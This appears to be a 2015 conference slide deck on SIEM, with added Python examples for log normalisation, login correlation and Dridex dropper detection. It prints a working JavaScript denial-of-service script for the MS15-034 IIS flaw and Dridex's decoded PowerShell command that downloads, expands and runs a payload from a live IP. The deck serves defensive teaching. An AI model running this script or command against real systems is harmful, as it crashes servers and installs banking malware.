2015 Security Conference
Security Information and Event Management (SIEM)
Paul Dutot IEng MIET MBCS CITP QSTM OSCP
Who Am I
• Head of Penetration Testing and SIEM within
Security Department @ Logicalis Jersey.
• Tiger Scheme accredited Penetration Tester.
• Certified in McAfee ESM and Vulnerability
Manager.
• My role is a mix of ethical hacking and using those
skills to provide Managed SIEM to our clients.
• Founder member of the CIISF and secretary of the
Jersey BCS branch.
• Incorporated Engineer (IEng) / Chartered IT Professional (CITP).
Our clients
• Managed SIEM Incident Response – World Wide Engineering Company in 68 countries.
• Managed SIEM – Fortune 100 American Financial Business – 23,000 IPs in 26 countries.
• Managed SIEM for SMBs – ranging from customers with 2 firewalls to 30 devices under management.
And everything in between…
All managed by staff at Logicalis in Jersey.
What we shall talk about…
• Business Risks – Where are the threats?
• What is SIEM? What does it solve?
• SIEM Concepts
• SIEM Architectures
• SIEM Features At A Glance
• Meet the Dridex Malware
• Questions
Business Risks – Risks by Category
[Chart: incident risks by category, 2014 vs 2015]
Source: Verizon Data Breach report
Business Risks – Incident Categorization by Industry Sector
Source: Verizon Data Breach report
MS15-034 – How Fast the Bad Guys Move…
From the Microsoft patch for MS15-034 to a reverse-engineered exploit for sale on the Darknet: less than 6 days.
<script>
/*
Name: IISer.htm
Description: Crashes a Windows IIS host vulnerable to
MS15-034
Author: Malik Mesellem (@MME_IT)
*/
//Variables
var ip = "10.0.1.1";
var file = "welcome.png"; //For W2K8R2
// var file = "iis-85.png"; //For W2K12R2
var payload = "bytes=18-18446744073709551615";
//Tested on W2K8R2 and W2K12R2
var xmlhttp = new XMLHttpRequest();
//Sends the HTTP request 10 times
for (i = 0; i < 10; i++){
xmlhttp.open("GET", "http://" + ip + "/" + file, true);
xmlhttp.setRequestHeader("Range", payload);
xmlhttp.send();
}
alert("Bye bye IIS!");
</script>
http://pastebin.com/SbN55M2H
Business Risks – Final Thoughts
“90% of all incidents is people. Whether it’s goofing up, getting infected, behaving badly or losing stuff, most incidents fall into the PEBKAC (Problem Exists Between Keyboard and Chair) and ID-10T (idiot) uber patterns.”
“Financial Motivation is also alive and well in phishing attacks. The old method of duping people into providing their personnel identification number or bank information is still around but the targets are largely individuals versus organizations. Phishing with the intent of device compromise is certainly present.”
Source: Verizon Data Breach report
Since October 2014, Jersey and Guernsey companies across all sectors have been targeted by the ‘Dridex’ malware through email phishing.
What is SIEM? What issues does it solve?
SIEM is the evolution and integration of two distinct technologies:
• Security Event Management (SEM) – primarily focused on collecting and aggregating security events.
• Security Information Management (SIM) – primarily focused on the enrichment, normalization and correlation of security events.
Security Information & Event Management (SIEM) is a set of technologies for:
• Log Data Collection
• Correlation
• Aggregation
• Normalization
• Retention
• Analysis and Workflow
Three major factors driving the majority of SIEM implementations:
1. Real-Time Threat Visibility
2. Security Operational Efficiency
3. Compliance and/or Log Management Requirements
SIEM Concepts – Visibility Problem
FACT: A small network with 20 desktops will produce an average of 46 events per second (EPS) = 165,600 per hour = 3,974,400 per day. Bursts of events are 1.5 times this figure.
Do you fancy trying to investigate that amount of events for a security issue?
SIEM Concepts – Compliance Problem
PCI-DSS compliance is one of the main drivers for a SIEM solution.
Meeting Section 10 – Logging Requirements is almost impossible without a SIEM!
There are at least 20 use cases for using SIEM to meet aspects of PCI-DSS – see
http://resources.infosecinstitute.com/siem-use-cases-pci-dss-3-0-part-1/
SIEM Concepts – Anatomy of an Event / Flow Life
Raw Logs / Flows, for example a Cisco ASA firewall deny:
<164>Apr 15 2015 10:04:53: %ASA-4-106023: Deny tcp src InsideLAN:192.168.4.35/50381 dst Outside:216.41.215.186/80 by access-group "inside_in" [0x0, 0x0]
Life of an event:
• Raw logs are stored in raw format and forensically tagged.
• Raw logs are normalised.
• The normalised log is processed by the correlation engine.
• Security Alert !!
• Events come from devices such as workstations, routers, AD servers and security devices.
• Flows come from flow collectors or flow-enabled devices such as firewalls.
• Lots of different flow types are supported, such as Netflow / Qflow.
• Lots of different device types and logging options.
Normalisation = the process of getting different record formats from different devices into a common format.
SIEM solutions are sized primarily by capacity in terms of Events Per Second (EPS).
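Normalisation in practice, as an added example that is not the presenter's or any vendor's code: it takes the ASA line above and turns it into a flat record with a common field set (the field names are an assumed schema), decoding the syslog PRI and the message body so the correlation engine sees the same keys whatever device produced the event.

```python
"""Normalise the Cisco ASA syslog line from the slide into a common event record.

Added example for the 'Anatomy of an Event' slide; not the presenter's or any
vendor's normaliser. The output field names are an assumed common schema.
"""
import re
from datetime import datetime

# The raw firewall log quoted on the slide.
RAW = ('<164>Apr 15 2015 10:04:53: %ASA-4-106023: Deny tcp src '
       'InsideLAN:192.168.4.35/50381 dst Outside:216.41.215.186/80 by '
       'access-group "inside_in" [0x0, 0x0]')

# <PRI>timestamp: %ASA-<level>-<msgid>: <body>
SYSLOG_RE = re.compile(
    r'^<(?P<pri>\d{1,3})>(?P<ts>\w{3} +\d{1,2} \d{4} \d{2}:\d{2}:\d{2}): '
    r'%ASA-(?P<level>\d)-(?P<msgid>\d{6}): (?P<body>.*)$')

# Body of 106023: Deny <proto> src <zone>:<ip>/<port> dst <zone>:<ip>/<port> by access-group "<acl>" ...
ACL_RE = re.compile(
    r'^(?P<action>Deny|Permit) (?P<proto>\w+) '
    r'src (?P<szone>[^:]+):(?P<sip>[\d.]+)/(?P<sport>\d+) '
    r'dst (?P<dzone>[^:]+):(?P<dip>[\d.]+)/(?P<dport>\d+) '
    r'by access-group "(?P<acl>[^"]+)"')


def normalise(line):
    """Return a flat dict of common fields; raise ValueError for a foreign format."""
    m = SYSLOG_RE.match(line)
    if not m:
        raise ValueError('not a Cisco ASA syslog line: %r' % line[:40])
    pri = int(m['pri'])
    event = {
        'vendor': 'cisco', 'product': 'asa', 'raw': line,
        'facility': pri // 8,   # RFC 3164: PRI = facility * 8 + severity,
        'severity': pri % 8,    # so 164 -> local4 (20), warning (4)
        'timestamp': datetime.strptime(m['ts'], '%b %d %Y %H:%M:%S').isoformat(),
        'msg_id': m['msgid'], 'asa_level': int(m['level']),
    }
    body = ACL_RE.match(m['body'])
    if body:   # ACL deny/permit messages carry the 5-tuple
        event.update({
            'action': body['action'].lower(), 'proto': body['proto'].lower(),
            'src_zone': body['szone'], 'src_ip': body['sip'], 'src_port': int(body['sport']),
            'dst_zone': body['dzone'], 'dst_ip': body['dip'], 'dst_port': int(body['dport']),
            'acl': body['acl'],
        })
    return event
```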
SIEM Concepts – Correlation
• Correlation is the process of looking at events to determine their relevance and their relationships to other events within the network, for example a successful login after a brute force attack.
• It can be applied in real-time and historical modes with a variety of rule types.
• 175+ correlation rules are enabled by default.
• Correlation enables us to gain visibility into other, non-traditional IT systems such as Access Control and BMS.
• Correlation rules combined with Watch Lists allow us to track security incidents, such as a malware infection, in real time.
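The "successful login after brute force" rule and the watch list that follows it, as an added example (not McAfee ESM's rule engine): `feed` is the real-time mode, `replay` the historical mode over stored events, and a source that trips the rule stays on the watch list so its later logins are surfaced too. Event field names and the sample events are constructed.

```python
"""Correlation rule: successful login after brute force, with a watch list.

Added example of the rule described on the slide; it is not McAfee ESM's rule
engine. Events are assumed already normalised to dicts with 'ts' (epoch
seconds), 'src_ip', 'user' and 'outcome' ('fail' or 'success').
"""
from collections import defaultdict, deque


class BruteForceThenSuccess:
    def __init__(self, threshold=5, window=300):
        self.threshold = threshold           # failed logins that count as brute force
        self.window = window                 # seconds within which they must occur
        self.failures = defaultdict(deque)   # src_ip -> timestamps of recent failures
        self.watch_list = {}                 # src_ip -> time it was first flagged
        self.alerts = []

    def feed(self, ev):
        """Real-time mode: one event in, an alert dict (or None) out."""
        src, now = ev['src_ip'], ev['ts']
        recent = self.failures[src]
        while recent and now - recent[0] > self.window:   # expire failures outside the window
            recent.popleft()
        if ev['outcome'] == 'fail':
            recent.append(now)
            return None
        if ev['outcome'] != 'success':
            return None
        if len(recent) >= self.threshold:        # success right after a burst of failures
            alert = {'rule': 'brute_force_then_success', 'src_ip': src,
                     'user': ev['user'], 'failures': len(recent), 'ts': now}
            self.watch_list.setdefault(src, now) # keep tracking this source
            recent.clear()
        elif src in self.watch_list:             # later success from a watched source
            alert = {'rule': 'watch_list_login', 'src_ip': src, 'user': ev['user'],
                     'first_flagged': self.watch_list[src], 'ts': now}
        else:
            return None
        self.alerts.append(alert)
        return alert

    def replay(self, events):
        """Historical mode: the same rule run over stored events in time order."""
        return [a for a in map(self.feed, sorted(events, key=lambda e: e['ts'])) if a]


# Constructed sample: five failures for 'admin' from 10.0.0.5 within a minute, then a
# success, an unrelated login from 10.0.0.9, and a later login from 10.0.0.5.
SAMPLE = [{'ts': 1000 + 10 * i, 'src_ip': '10.0.0.5', 'user': 'admin', 'outcome': 'fail'}
          for i in range(5)] + [
    {'ts': 1050, 'src_ip': '10.0.0.5', 'user': 'admin', 'outcome': 'success'},
    {'ts': 1060, 'src_ip': '10.0.0.9', 'user': 'alice', 'outcome': 'success'},
    {'ts': 4000, 'src_ip': '10.0.0.5', 'user': 'svc_backup', 'outcome': 'success'},
]
```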
SIEM Architecture – ESM / REC / ELM
[Diagram: log sources – Servers, Wireless Access Points, Main Office, VPN Endpoints, IDS / IPS, Switches / Routers, Linux, Desktops – sending to the Receiver, the ESM and the ELM]
• Events / Flows arrive at the Receiver.
• Raw logs are tagged and stored in the Enterprise Log Manager (ELM).
• Normalisation and Correlation take place in the Enterprise Security Manager (ESM).
• Log collection can be in various formats (Syslog / SDEE for example).
• Desktop collection can be agent-based, such as OSSEC HIDS, or agentless, e.g. WMI.
• The solution can be ‘Cloud’, ‘On Premise’ or a ‘Hybrid’, with high availability.
SIEM Features – At A Glance
• Powerful Investigation of Events – find what is important in 3 clicks.
• Case Management of Incidents.
• Automate responses to Incidents.
• API to Interrogate / Update SIEM.
• Anomaly Behaviour Detection.
• Custom Dashboards and Powerful Reporting.
• Zone Management.
• Integration with Threat Intelligence Feeds – Public and Private.
• Data Enrichment allows us to further augment log content.
Why use a Logicalis Managed SIEM solution?
• Expertise – Logicalis Jersey is the worldwide security centre of excellence for Logicalis Group.
• Cost.
• Flexible consumption models.
• Strategic Partners.
• ISO27001 Certified.
• Redundant Data Centres in Jersey and Guernsey, resolving jurisdictional data issues.
• Our multi-tenanted solution ensures data segregation at all levels.
Meet Dridex – Banking Malware
It has code hidden in an Excel spreadsheet: a VBA macro virus with a hidden URL. When decoded it becomes…
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%JIOiodfhioIH.cab'); expand %TEMP%JIOiodfhioIH.cab %TEMP%JIOiodfhioIH.exe; start %TEMP%JIOiodfhioIH.exe;
Feb 2015: Only 3 out of 57 AV Engines detected it.
Apr 2015: 39 out of 55.
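Since AV missed the dropper for months, the chain itself is what a SIEM should look for: a command shell spawned by an Office application whose command line downloads and expands a payload. The following is an added detection example, not the presenter's code; it assumes process-creation events already normalised to pid / ppid / image / cmdline, and the sample events are constructed with a TEST-NET address in place of the real download host.

```python
"""Flag Office-spawned shells that download and run a payload, i.e. the Dridex
dropper chain on the slide (Excel macro -> cmd -> PowerShell DownloadFile).

Added detection example, not the presenter's code. Process-creation records are
assumed already normalised to dicts with pid, ppid, image and cmdline; the
sample is constructed and uses a TEST-NET address instead of the real host.
"""
import re

OFFICE = {'excel.exe', 'winword.exe', 'powerpnt.exe', 'outlook.exe'}
# Tokens from the decoded macro command: WebClient download, then expand a .cab out of %TEMP%.
DOWNLOADER = re.compile(r'new-object\s+system\.net\.webclient|\.downloadfile\(|expand\s+%temp%', re.I)


def ancestors(ev, by_pid):
    """Yield parent, grandparent, ... by following ppid (guarding against pid-reuse loops)."""
    seen = set()
    parent = by_pid.get(ev['ppid'])
    while parent and parent['pid'] not in seen:
        seen.add(parent['pid'])
        yield parent
        parent = by_pid.get(parent['ppid'])


def detect(events, max_depth=3):
    """Return a hit for each downloader command line with an Office app within max_depth parents."""
    by_pid = {e['pid']: e for e in events}
    hits = []
    for ev in events:
        if not DOWNLOADER.search(ev['cmdline']):
            continue
        chain = [ev['image'].lower()] + [a['image'].lower() for a in ancestors(ev, by_pid)]
        if any(img in OFFICE for img in chain[1:max_depth + 1]):
            hits.append({'pid': ev['pid'], 'chain': ' <- '.join(chain), 'cmdline': ev['cmdline']})
    return hits


PS_CMD = ("PowerShell.exe (New-Object System.Net.WebClient).DownloadFile("
          "'http://198.51.100.7/stage/dxzq.jpg','%TEMP%JIOiodfhioIH.cab'); "
          "expand %TEMP%JIOiodfhioIH.cab %TEMP%JIOiodfhioIH.exe; start %TEMP%JIOiodfhioIH.exe;")

# Constructed sample: an Excel-spawned dropper chain plus an admin download with no Office parent.
SAMPLE = [
    {'pid': 100, 'ppid': 1,   'image': 'explorer.exe',   'cmdline': 'explorer.exe'},
    {'pid': 200, 'ppid': 100, 'image': 'EXCEL.EXE',      'cmdline': '"EXCEL.EXE" invoice.xls'},
    {'pid': 300, 'ppid': 200, 'image': 'cmd.exe',        'cmdline': 'cmd /K ' + PS_CMD},
    {'pid': 400, 'ppid': 300, 'image': 'PowerShell.exe', 'cmdline': PS_CMD},
    {'pid': 500, 'ppid': 100, 'image': 'PowerShell.exe',
     'cmdline': "PowerShell.exe (New-Object System.Net.WebClient).DownloadFile("
                "'http://198.51.100.9/update.zip', 'C:\\tmp\\update.zip')"},
]
```

The same DownloadFile text run from explorer.exe (pid 500) is not flagged: it is the Office parent in the chain, not the download call on its own, that makes the event worth an alert.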
ACME Trust – Anatomy of a Compromise
[Diagram: Dridex C2 Server, Operator, Higher Level Hacker, File Server, AD Domain Server, Database Server]
• Malware installs a Key Logger and a Remote Access Trojan (RAT).
• Access sold to higher level hacker. Hacker uses already compromised credentials to upload Trojan versions / documents to the file server using credentials obtained via key logger.
• Database Server credentials are obtained and the Database Server is compromised. Data exfiltration begins..
• Eventually AD compromised = network compromised. You could find out like this……
Real Reputational Damage
http://dpaste.dzfl.pl/866433ffd07a
Demo Time
Bypassing Anti Virus using Windows
Powershell in Excel
One for the Defenders
Hunting Malware with SysInternals Suite
Video
https://www.youtube.com/watch?v=Wuy_Pm3KaV8
PowerPoint
video.ch9.ms/sessions/teched/na/2014/DCIM-B368.pptx
“When combining the results from all four AV engines, less than
40% of the binaries were detected.”
Source:
CAMP: Content-Agnostic Malware Protection
Proceedings of the 20th Annual Network & Distributed System Security Symposium
Thank You
Questions
